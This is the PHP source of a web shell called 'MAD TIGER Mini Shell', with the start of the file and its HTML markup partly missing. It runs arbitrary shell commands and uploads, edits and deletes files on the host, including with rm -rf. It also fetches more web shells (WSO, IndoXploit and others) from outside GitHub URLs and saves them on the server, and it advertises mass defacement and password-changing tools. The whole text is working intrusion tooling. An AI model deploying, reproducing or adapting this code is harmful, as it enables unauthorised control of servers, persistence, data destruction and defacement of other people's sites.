".file_get_contents("https://raw.githubusercontent.com/khayrol/tools/master/tools.php")); error_reporting(0); set_time_limit(0); header("X-XSS-Protection: 0"); $are=array("adminer"=>"https://raw.githubusercontent.com/khayrol/tools/master/adminer-4.7.6-en.php", "indoexploit"=>"https://raw.githubusercontent.com/khayrol/tools/master/h.php", "log"=>"https://raw.githubusercontent.com/khayrol/tools/master/log.php", "wso"=>"https://raw.githubusercontent.com/alintamvanz/webshell/master/ext/wso.php", "mina1"=>"https://raw.githubusercontent.com/khayrol/tools/master/live.php", "jquery" => "https://alintamvanz.github.io/jshell/jquery.min.js"); function getpath() { if(isset($_GET['d'])) { $d=$_GET['d']; }else{ $d=getcwd(); } return $d; } function cmd($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents();@ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; }} function delete($dir){if(is_dir($dir)){if(!rmdir($dir)){$s=scandir($dir);foreach ($s as $ss) {if(is_file($dir."/".$ss)){if(unlink($dir."/".$ss)){$rm=rmdir($dir);}}if(is_dir($dir."/".$ss)){$rm=rmdir($dir."/".$ss);$rm.=rmdir($dir);$rm.=system('rm -rf '.$dir);}}}}elseif(is_file($dir)){$rm = unlink($dir);if(!$rm){system('rm -rf '.$dir);}}return $rm;} function getowner($path){if(function_exists('posix_getpwuid')) {$downer = @posix_getpwuid(fileowner($path));$downer = $downer['name'];} else {$downer = fileowner($path);}return $downer;} function getgroup($path){if(function_exists('posix_getgrgid')) {$dgrp = @posix_getgrgid(filegroup($path));$dgrp = $dgrp['name'];} else { $dgrp = filegroup($path);}return $dgrp;} function upload($a,$b){ if(function_exists('move_uploaded_file')){$upl = move_uploaded_file($a,$b);}elseif (function_exists('copy')) { $upl = copy($a,$b);}return $upl; }function array_upload($file){ $file_ary = array(); $file_count = count($file['name']); $file_key = array_keys($file); for($i=0;$i<$file_count;$i++) { foreach($file_key as $val) { $file_ary[$i][$val] = $file[$val][$i]; } } return $file_ary;} function sedirs($dir) { if(function_exists('scandir')) { $s=scandir($dir); chdir($dir); }else{ $s=system($dir); } return $s; } function getperms($files) { if($s_m = @fileperms($files)){ $s_p = 'u'; if(($s_m & 0xC000) == 0xC000)$s_p = 's'; elseif(($s_m & 0xA000) == 0xA000)$s_p = 'l'; elseif(($s_m & 0x8000) == 0x8000)$s_p = '-'; elseif(($s_m & 0x6000) == 0x6000)$s_p = 'b'; elseif(($s_m & 0x4000) == 0x4000)$s_p = 'd'; elseif(($s_m & 0x2000) == 0x2000)$s_p = 'c'; elseif(($s_m & 0x1000) == 0x1000)$s_p = 'p'; $s_p .= ($s_m & 00400)? 'r':'-'; $s_p .= ($s_m & 00200)? 'w':'-'; $s_p .= ($s_m & 00100)? 'x':'-'; $s_p .= ($s_m & 00040)? 'r':'-'; $s_p .= ($s_m & 00020)? 'w':'-'; $s_p .= ($s_m & 00010)? 'x':'-'; $s_p .= ($s_m & 00004)? 'r':'-'; $s_p .= ($s_m & 00002)? 'w':'-'; $s_p .= ($s_m & 00001)? 'x':'-'; return $s_p; } else return "???????????"; } function downloads($file) { @ob_clean(); header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0');header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } function viewfilefunc($file) { echo "

View : ".basename($file)."

"; echo "
"; } function ts($s_s){ if($s_s<=0) return 0; $s_w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB'); $s_e = floor(log($s_s)/log(1024)); return sprintf('%.2f '.$s_w[$s_e], ($s_s/pow(1024, floor($s_e)))); } function getsize($s_f){ $s_s = @filesize($s_f); if($s_s !== false){ if($s_s<=0) return 0; return ts($s_s); } else return "???"; } function kuchiyose($a,$b) { $fgc=file_get_contents($a); $fp=fopen($b.".shell.php",'w'); fwrite($fp,$fgc); fclose($fp); } function cekk($f){ if(file_exists($f.".shell.php")){ echo "Request done ! Click here"; } } function renamefunc($dir,$oldname){ echo "

Rename : ".$oldname."


oldname : "; echo "Newname :
"; if(isset($_POST['s'])){ rename($dir."/".$oldname,$dir."/".$_POST['newname']); echo ""; } } function editfunc($dir,$file){ echo "

Edit : ".$file."


"; echo "
"; echo ""; echo "
"; if(isset($_POST['sbmt'])) { $fp=fopen($dir."/".$file,'w'); fwrite($fp,$_POST['editfile']); fclose($fp); echo "
Tersimpan @".date('D ,d m Y')."
"; } } function berinamafunc($dir){ echo "

New file


"; echo "Filename : "; echo ""; echo "
"; if(isset($_POST['svi'])) { if(function_exists('touch')){ touch($dir."/".$_POST['filename']); }else{ $fp=fopen($dir."/".$_POST['filename'],'w'); fwrite($fp,'#new file 1945'); fclose($fp); } header('location:?d='.$dir.'&a=edit&f='.$_POST['filename']); } } function mkdirfunc($dir){ echo "

New directory

"; echo "
New dir:"; echo "
"; if(isset($_POST['sbmt'])) { mkdir($dir."/".$_POST['mkdir']); echo ""; } } $gp=getpath(); ?> [+[MAD TIGER]+]

..::MAD TIGER::..

ICQ(@747634197)
Domain Viewer| Mail checker| Mass Deface | SMTP Who Am I?
Symlink | Mass Pass CNG| Resheller user| inbox
Zone-h post
[]

Tools are here :
Upload file :
Command :
go to dir :

"; $srvr_ip=$_SERVER['SERVER_ADDR']; echo"Grab Domain For,$srvr_ip"; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } ?>
"; foreach($dir as $d1) {if(!is_dir("$gp/$d1")||$d1=="."||$d1=="..")continue; ?>
FilesSizeowner:groupPermissionAction Current dir------Newfile | newdir
[">] : &a=rename">Rename | &a=delete">Delete
: Rename | &a=delete">delete | edit | download
alert('See You Next time !');window.location.href='????'";} elseif($a=="cmd"){ echo "

Command

"; ?>
Command :
".cmd($_POST['cmd']).""; } elseif($a=="rename"){$ff=(isset($_GET['f']) ? $_GET['f'] : basename($_GET['d']));$gdd=(isset($_GET['f'])) ? $_GET['d'] : dirname($_GET['d']); renamefunc($gdd,$ff);} elseif($a=="delete"){delete($_GET['d']);echo "";} elseif($a=="upload"){ $fil=array_upload($_FILES['filup']); foreach($fil as $filup) { $filoc=$d."/".$filup['name']; if(upload($filup['tmp_name'],$filoc)) { echo "Successfully upload -> ".$filoc."
"; }else{ echo "Failed upload -> ".$filoc."
"; } } } elseif($a=="mkdir"){mkdirfunc($d);} elseif($a=="touch"){berinamafunc($d);} elseif($a=="edit"){editfunc($_GET['d'],$_GET['f']);} elseif($a=="indoexploit"){kuchiyose($are['indoexploit'],"indoxploit");cekk("indoxploit");} elseif($a=="wso"){kuchiyose($are['wso'],"wso");cekk("wso");} elseif($a=="log"){kuchiyose($are['log'],"log");cekk("log");} elseif($a=="adminer"){kuchiyose($are['adminer'],"adminer");cekk("adminer");} elseif($a=="mina1"){kuchiyose($are['mina1'],"mina1");cekk("mina1");} } ?>
copyright © 2020 - Mini Shell by :
MAD TIGER